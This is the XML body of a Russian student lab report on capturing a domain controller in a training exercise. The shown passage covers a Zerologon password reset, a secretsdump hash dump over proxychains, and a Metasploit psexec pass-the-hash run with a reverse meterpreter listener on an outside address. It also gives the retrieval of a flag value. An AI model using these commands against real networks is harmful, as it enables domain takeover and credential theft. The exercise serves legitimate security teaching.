          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4807127"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Модуль Zerologon" title="" id="82" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/017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7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Модуль Zerologon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Пароль machine account сброшен.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="88" w:name="дамп-хешей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3.4.3 Дамп хешей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Получен дамп хешей учетных записей (рис. 18):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> impacket-secretsdump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'AD$@10.10.10.20'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-no-pass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3399485"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Дамп хешей учетных записей" title="" id="86" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/01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Дамп хешей учетных записей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Получены:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Хеши всех пользователей домена, включая Administrator.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="92" w:name="получение-сессии-на-контроллере-домена"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SectionNumber"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.4.4 Получение сессии на контроллере домена</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использован модуль psexec с полученным хешем (рис. 19):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/windows/smb/psexec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smbuser Administrator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smbpass aad3b435b51404eeaad3b435b51404ee:1b21da9cb62cfcaf16c5dd263255bf6f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rhosts 10.10.10.20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lhost 195.239.174.11</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2505223"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Модуль psexec" title="" id="90" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/01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Модуль psexec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Успешное получение meterpreter-сессии на контроллере домена.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="103" w:name="этап-4-получение-флага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Этап 4: Получение флага</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="95" w:name="поиск-через-ldap-первый-метод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 Поиск через LDAP (первый метод)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Из вывода ldapsearch получен флаг:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cn: Flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">description: 63278</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="102" w:name="подтверждение-через-командную-оболочку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 Подтверждение через командную оболочку</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Через полученную сессию на контроллере домена (рис. 20)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user /domain Flag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В поле</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пользователя Flag найден флаг:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">63278</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="6357791"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Получен флаг" title="" id="97" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/020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57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Получен флаг</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Общие результаты (рис. 21):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3139632"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Выполнение задания" title="" id="100" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/02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9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Выполнение задания</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104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успешно выполнены все этапы атаки на контроллер домена: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Начальный доступ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- получен через уязвимость в WordPress плагине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Разведка сети</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- обнаружена внутренняя сеть 10.10.10.0/24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Туннелирование</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- настроены маршруты и SOCKS прокси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Обнаружение цели</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- идентифицирован контроллер домена 10.10.10.20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attack vectors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Успешный bruteforce RDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Поиск через LDAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплуатация критической уязвимости Zerologon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Эскалация привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- получен полный доступ к домену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Достижение цели</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- найден флаг</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">63278</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Работа демонстрирует важность комплексного подхода к безопасности и своевременного устранения известных уязвимостей.</w:t>
      </w:r>
    </w:p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24" Target="media/rId24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№4-В. ЗАХВАТ КОНТРОЛЛЕРА ДОМЕНА</dc:title>
  <dc:creator>Боровиков Даниил; Хрусталев Влад; Гисматуллин Артём; Чесноков Артёмий; Коннова Татьяна; Нефедова Наталья; Уткина Алина; Бансимба Клодели</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-09T17:54:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-09T17:54:15Z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Кибербезопасность предприятия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